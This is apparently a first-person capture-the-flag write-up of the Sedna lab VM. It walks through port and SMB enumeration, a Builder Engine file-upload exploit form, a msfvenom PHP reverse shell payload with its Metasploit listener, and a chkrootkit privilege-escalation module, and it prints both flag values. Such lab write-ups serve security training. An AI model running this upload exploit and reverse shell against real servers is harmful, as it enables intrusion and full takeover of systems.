hackfest2016: Sedna CTF

As usual, started with host discovery.

root@kali:~# netdiscover -r 10.0.2.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:5e:b4:5a 1 60 Cadmus Computer Systems
10.0.2.44 08:00:27:d7:39:26 1 60 Cadmus Computer Systems

Then scanned the IP for open ports.

root@kali:~# nmap -p --script=banner 10.0.2.44
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.44
Host is up (0.00059s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
53/tcp open domain
80/tcp open http
110/tcp open pop3
|_banner: +OK Dovecot (Ubuntu) ready.
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID
|_ENABLE IDLE STARTTLS LOGINDISABLED] Dovecot (Ubuntu) ready.
445/tcp open microsoft-ds
993/tcp open imaps
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID
|_ENABLE IDLE AUTH=PLAIN] Dovecot (Ubuntu) ready.
995/tcp open pop3s
|_banner: +OK Dovecot (Ubuntu) ready.
8080/tcp open http-proxy
38590/tcp open unknown
MAC Address: 08:00:27:D7:39:26 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds

In this VM there were lots of open ports. I thought this could be useful. So firstly I checked for SMB 445/tcp port for enumeration with enum4linux.

root@kali:~# enum4linux 10.0.2.44
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ )
==========================
| Target Information |
==========================
Target ……….. 10.0.2.44
RID Range …….. 500–550,1000–1050
Username ……… ‘’
Password ……… ‘’
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=================================================
| Enumerating Workgroup/Domain on 10.0.2.44 |
=================================================
[+] Got domain/workgroup name: WORKGROUP
=========================================
| Nbtstat Information for 10.0.2.44 |
=========================================
Looking up status of 10.0.2.44
SEDNA <00> — B <ACTIVE> Workstation Service
SEDNA <03> — B <ACTIVE> Messenger Service
SEDNA <20> — B <ACTIVE> File Server Service
..__MSBROWSE__. <01> — <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> — <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> — B <ACTIVE> Master Browser
WORKGROUP <1e> — <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00–00–00–00–00–00
==================================
| Session Check on 10.0.2.44 |
==================================
[+] Server 10.0.2.44 allows sessions using username ‘’, password ‘’
========================================
| Getting domain SID for 10.0.2.44 |
========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup
===================================
| OS information on 10.0.2.44 |
===================================
[+] Got OS info for 10.0.2.44 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
[+] Got OS info for 10.0.2.44 from srvinfo:
SEDNA Wk Sv PrQ Unx NT SNT Sedna server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
==========================
| Users on 10.0.2.44 |
==========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]
======================================
| Share Enumeration on 10.0.2.44 |
======================================
WARNING: The “syslog” option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Sharename Type Comment
— — — — — — — — — — -
IPC$ IPC IPC Service (Sedna server (Samba, Ubuntu))
print$ Disk Printer Drivers
Server Comment
— — — — — — — — -
SEDNA Sedna server (Samba, Ubuntu)
Workgroup Master
— — — — — — — — -
WORKGROUP SEDNA
[+] Attempting to map shares on 10.0.2.44
//10.0.2.44/IPC$ Mapping: OK Listing: DENIED
//10.0.2.44/print$ Mapping: DENIED, Listing: N/A
=================================================
| Password Policy Information for 10.0.2.44 |
=================================================
[+] Attaching to 10.0.2.44 using a NULL share
[+] Trying protocol 445/SMB…
[+] Found domain(s):
[+] SEDNA
[+] Builtin
[+] Password Info for Domain: SEDNA
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
===========================
| Groups on 10.0.2.44 |
===========================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
====================================================================
| Users on 10.0.2.44 via RID cycling (RIDS: 500–550,1000–1050) |
====================================================================
[I] Found new SID: S-1–5–21–2217169221–2747901371–1699642345
[I] Found new SID: S-1–22–1
[+] Enumerating users using SID S-1–5–21–2217169221–2747901371–1699642345 and logon username ‘’, password ‘’
[+] Enumerating users using SID S-1–22–1 and logon username ‘’, password ‘’
S-1–22–1–1000 Unix User\crackmeforpoints (Local User)
==========================================
| Getting printer info for 10.0.2.44 |
==========================================
No printers returned.

Samba allowed Null sessions so there were lots of information. I thought there were 3 important information in report.

1st; Samba version. Checked it but could not find an exploit.

2nd; Shares. Found nothing in them.

3rd; Local user crackmeforpoints. I did not found the password. At first I tried to brute force on pop3s, imaps but it was so slow and I did not want to wait for that. It was a CTF VM, it should have an quicker way to get in, so interrupted the brute force attempts and looked for another way.

I still had 2 http ports open to check for, port 80/tcp and 8080/tcp. Started with 80/tcp, ran dirb.

root@kali:~# dirb http://10.0.2.44
 — — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -
URL_BASE: http://10.0.2.44/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
— — — — — — — — -
GENERATED WORDS: 4612
— — Scanning URL: http://10.0.2.44/ — —
==> DIRECTORY: http://10.0.2.44/blocks/
==> DIRECTORY: http://10.0.2.44/files/
+ http://10.0.2.44/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://10.0.2.44/modules/
+ http://10.0.2.44/robots.txt (CODE:200|SIZE:36)
+ http://10.0.2.44/server-status (CODE:403|SIZE:289)
==> DIRECTORY: http://10.0.2.44/system/
==> DIRECTORY: http://10.0.2.44/themes/
 — — Entering directory: http://10.0.2.44/blocks/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
 — — Entering directory: http://10.0.2.44/files/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
 — — Entering directory: http://10.0.2.44/modules/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
 — — Entering directory: http://10.0.2.44/system/ — — 
==> DIRECTORY: http://10.0.2.44/system/core/
==> DIRECTORY: http://10.0.2.44/system/database/
==> DIRECTORY: http://10.0.2.44/system/fonts/
==> DIRECTORY: http://10.0.2.44/system/helpers/
+ http://10.0.2.44/system/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://10.0.2.44/system/language/
==> DIRECTORY: http://10.0.2.44/system/libraries/
 — — Entering directory: http://10.0.2.44/themes/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
 — — Entering directory: http://10.0.2.44/system/core/ — — 
==> DIRECTORY: http://10.0.2.44/system/core/compat/
+ http://10.0.2.44/system/core/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/database/ — — 
==> DIRECTORY: http://10.0.2.44/system/database/drivers/
+ http://10.0.2.44/system/database/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/fonts/ — — 
+ http://10.0.2.44/system/fonts/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/helpers/ — — 
+ http://10.0.2.44/system/helpers/index.html (CODE:200|SIZE:142)
— — Entering directory: http://10.0.2.44/system/language/ — —
==> DIRECTORY: http://10.0.2.44/system/language/english/
+ http://10.0.2.44/system/language/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/libraries/ — — 
+ http://10.0.2.44/system/libraries/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/core/compat/ — — 
+ http://10.0.2.44/system/core/compat/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/database/drivers/ — — 
+ http://10.0.2.44/system/database/drivers/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://10.0.2.44/system/database/drivers/mssql/
==> DIRECTORY: http://10.0.2.44/system/database/drivers/mysql/
==> DIRECTORY: http://10.0.2.44/system/database/drivers/odbc/
 — — Entering directory: http://10.0.2.44/system/language/english/ — — 
+ http://10.0.2.44/system/language/english/index.html (CODE:200|SIZE:142)
— — Entering directory: http://10.0.2.44/system/database/drivers/mssql/ — —
+ http://10.0.2.44/system/database/drivers/mssql/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/database/drivers/mysql/ — — 
+ http://10.0.2.44/system/database/drivers/mysql/index.html (CODE:200|SIZE:142)
 — — Entering directory: http://10.0.2.44/system/database/drivers/odbc/ — — 
+ http://10.0.2.44/system/database/drivers/odbc/index.html (CODE:200|SIZE:142)
— — — — — — — — -
DOWNLOADED: 64568 — FOUND: 16

Robots.txt file did not helped me. So I browsed in found directories. In files directory I found some images. Some of them were images about Builder Engine.

After a Google search I found a exploit about it, a file inclusion exploit. Best to open a reverse shell. I changed the IP address of the given exploit and saved as html file.

<html>
<body>
<form method=”post” action=”http://10.0.2.44/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype=”multipart/form-data”>
<input type=”file” name=”files[]” />
<input type=”submit” value=”send” />
</form>
</body>
</html>

Then I created a php reverse shell with msfvenom.

root@kali:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 944 bytes

Uploaded the file with the form in exploit.

After I clicked the “send” button, response returned me the location of the reverse shell file.

{“files”:[{“name”:”shell.php”,”size”:945,”type”:”application\/x-php”,”url”:”http:\/\/10.0.2.44\/files\/shell.php”,”deleteUrl”:”http:\/\/10.0.2.44\/themes\/dashboard\/assets\/plugins\/jquery-file-upload\/server\/php\/?file=shell.php”,”deleteType”:”DELETE”}]}

Opened metasploit and launced a listener.

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost 10.0.2.5
lhost => 10.0.2.5
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] Starting the payload handler…

After I requested the shell script, I had uploaded, I gained the reverse shell to VM.

[*] Sending stage (33068 bytes) to 10.0.2.44
[*] Meterpreter session 1 opened (10.0.2.5:4444 -> 10.0.2.44:41432) at 2017–03–20 14:47:14 -0400
meterpreter >

First flag was in the /var/www directory.

meterpreter > ls
Listing: /var/www
=================
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
100644/rw-r — r — 33 fil 2016–10–22 13:33:24 -0400 flag.txt
40755/rwxr-xr-x 4096 dir 2016–10–25 09:27:06 -0400 html
meterpreter > cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289

Now it was time to escalate privileges. I had some unsuccessful exploit attempts with the kernel version. Then I looked for the /etc folder to find something to exploit to gain root access and I saw chkrootkit was installed.

meterpreter > cd etc
meterpreter > ls
Listing: /etc
=============
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
40755/rwxr-xr-x 4096 dir 2016–10–07 15:16:49 -0400 .java
...
40755/rwxr-xr-x 4096 dir 2016–10–07 15:15:42 -0400 ca-certificates
100644/rw-r — r — 7464 fil 2016–10–07 15:16:49 -0400 ca-certificates.conf
40755/rwxr-xr-x 4096 dir 2016–10–07 15:16:24 -0400 calendar
42750/rwxr-x — — 4096 dir 2016–10–07 15:16:54 -0400 chatscripts
40755/rwxr-xr-x 4096 dir 2016–10–22 13:04:31 -0400 chkrootkit
100644/rw-r — r — 1332 fil 2016–10–07 15:17:29 -0400 colord.conf
40755/rwxr-xr-x 4096 dir 2016–10–07 15:11:31 -0400 console-setup
...

Checked for its version.

meterpreter > cd chkrootkit
meterpreter > ls
Listing: /etc/chkrootkit
========================
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
100444/r — r — r — 4216 fil 2016–10–22 13:04:31 -0400 ACKNOWLEDGMENTS
100444/r — r — r — 1343 fil 2016–10–22 13:04:31 -0400 COPYRIGHT
100444/r — r — r — 1636 fil 2016–10–22 13:04:31 -0400 Makefile
100444/r — r — r — 14321 fil 2016–10–22 13:04:31 -0400 README
100444/r — r — r — 1323 fil 2016–10–22 13:04:31 -0400 README.chklastlog
100444/r — r — r — 1292 fil 2016–10–22 13:04:31 -0400 README.chkwtmp
100444/r — r — r — 7195 fil 2016–10–22 13:04:31 -0400 check_wtmpx.c
100444/r — r — r — 7107 fil 2016–10–22 13:04:31 -0400 chkdirs.c
100444/r — r — r — 7725 fil 2016–10–22 13:04:31 -0400 chklastlog.c
100444/r — r — r — 9742 fil 2016–10–22 13:04:31 -0400 chkproc.c
100755/rwxr-xr-x 76181 fil 2016–10–22 13:04:31 -0400 chkrootkit
100444/r — r — r — 582 fil 2016–10–22 13:04:31 -0400 chkrootkit.lsm
100444/r — r — r — 5594 fil 2016–10–22 13:04:31 -0400 chkutmp.c
100444/r — r — r — 2213 fil 2016–10–22 13:04:31 -0400 chkwtmp.c
100444/r — r — r — 8892 fil 2016–10–22 13:04:31 -0400 ifpromisc.c
100444/r — r — r — 2437 fil 2016–10–22 13:04:31 -0400 strings.c
meterpreter > cat README
chkrootkit V. 0.49

Yes! I could try this to exploit. So I backgrounded metasploit session and searched for chkrootkit.

meterpreter > background
[*] Backgrounding session 1…
msf exploit(handler) > search chkrootkit
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
— — — — — — — — — — — — — — — — — -
exploit/unix/local/chkrootkit 2014–06–04 manual Chkrootkit Local Privilege Escalation
msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on.
Exploit target:
Id Name
— — —
0 Automatic
msf exploit(chkrootkit) > show sessions
Active sessions
===============
Id Type Information Connection
— — — — — — — — — — — — — —
1 meterpreter php/php www-data (33) @ Sedna 10.0.2.5:4444 -> 10.0.2.44:41432 (10.0.2.44)
msf exploit(chkrootkit) > set session 1
session => 1
msf exploit(chkrootkit) > exploit
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 10.0.2.5:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron…

After a while, I gained a new session with root.

[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo rEmlPWGkL1wi5JOb;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “rEmlPWGkL1wi5JOb\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 2 opened (10.0.2.5:4444 -> 10.0.2.44:41433) at 2017–03–20 14:55:04 -0400
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -l
Active sessions
===============
Id Type Information Connection
— — — — — — — — — — — — — —
1 meterpreter php/php www-data (33) @ Sedna 10.0.2.5:4444 -> 10.0.2.44:41432 (10.0.2.44)
2 shell unix 10.0.2.5:4444 -> 10.0.2.44:41433 (10.0.2.44)
msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2…
1280966135
UxVexjuFsKFwWPFLYaXNmoqgNQUMODBo
true
mgZNVmnxnOWjCKPRJwTFXJZfsfZPFBYP
ERROR: ld.so: object ‘/tmp/ofs-lib.so’ from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
DozbjCajNjYyKqeOGiNuEBKzuDlYHpQQ
YdOiZRijWnVqetTEvUNZrnpspaXWUltq
whoami
ERROR: ld.so: object ‘/tmp/ofs-lib.so’ from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
root

Then I searched for flag.txt files.

updatedb
ERROR: ld.so: object ‘/tmp/ofs-lib.so’ from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
locate flag.txt
ERROR: ld.so: object ‘/tmp/ofs-lib.so’ from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
/root/flag.txt
/var/www/flag.txt
cat /root/flag.txt
ERROR: ld.so: object ‘/tmp/ofs-lib.so’ from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
a10828bee17db751de4b936614558305

I think the other flag something about the crackmeforpoints user, but my mail goal was to get root access so did not try to do something about the user account.